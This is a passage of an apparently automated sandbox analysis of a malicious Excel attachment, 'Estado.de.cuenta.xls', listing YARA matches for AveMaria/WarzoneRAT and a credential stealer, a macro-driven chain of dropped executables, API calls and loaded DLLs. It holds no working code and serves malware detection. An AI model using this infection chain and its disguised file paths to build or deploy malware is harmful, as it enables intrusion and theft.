                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00444358
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00440B08
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_004457A0
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00444050
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00445794
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C6851
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C4A5D
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C1EC9
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C0B08
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C4358
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C57A0
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C403F
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C4050
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C0AF9
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C5794
                Source: Estado.de.cuenta.xls | OLE, VBA macro line: Sub Workbook_Open()
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open | Name: Workbook_Open
                Source: Estado.de.cuenta.xls | OLE indicator, VBA macros: true
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: String function: 004035E5 appears 40 times
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: String function: 00410969 appears 47 times
                Source: 4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 11.2.msimages.exe.29b1654.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 14.2.msimages.exe.29af650.3.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: asxhfzdhhz[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: VPZVQXDUT.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: msimages.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@18/5@73/2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_004120B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0041290F CoInitialize,CoCreateInstance,VariantInit,CoUninitialize
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_004130B3 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | File created: C:\Program Files\Microsoft DN1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: C:\ProgramData\msimages.exe | Mutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR8075.tmp
                Source: Estado.de.cuenta.xls | OLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\ProgramData\msimages.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: Estado.de.cuenta.xls | ReversingLabs: Detection: 50%
                Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process created: C:\ProgramData\msimages.exe "C:\ProgramData\msimages.exe"
                Source: C:\ProgramData\msimages.exe | Process created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
                Source: unknown | Process created: C:\ProgramData\msimages.exe "C:\ProgramData\msimages.exe"
                Source: C:\ProgramData\msimages.exe | Process created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: rpcrtremote.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: netapi32.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: wkscli.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: samcli.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: msdmo.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: avicap32.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Section loaded: msvfw32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64win.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64cpu.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: version.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: amsi.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: bcrypt.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: cryptsp.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: rpcrtremote.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64win.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64cpu.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: bcrypt.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: version.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: netapi32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: netutils.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: srvcli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wkscli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: samcli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: winmm.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: ntmarta.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: msdmo.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: avicap32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: msvfw32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: dnsapi.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: iphlpapi.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: winnsi.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: dhcpcsvc.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: rasadhlp.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wbemcomn2.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: cryptsp.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: rpcrtremote.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: ntdsapi.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64win.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64cpu.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: bcrypt.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: version.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: netapi32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: netutils.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: srvcli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wkscli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: samcli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: winmm.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: ntmarta.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: msdmo.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: avicap32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: msvfw32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64win.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64cpu.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: version.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: amsi.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: bcrypt.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: cryptsp.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: rpcrtremote.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64win.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64cpu.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: bcrypt.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: version.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: netapi32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: netutils.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: srvcli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wkscli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: samcli.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: winmm.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: ntmarta.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: msdmo.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: avicap32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: msvfw32.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64win.dll
                Source: C:\ProgramData\msimages.exe | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Directory created: C:\Program Files\Microsoft DN1
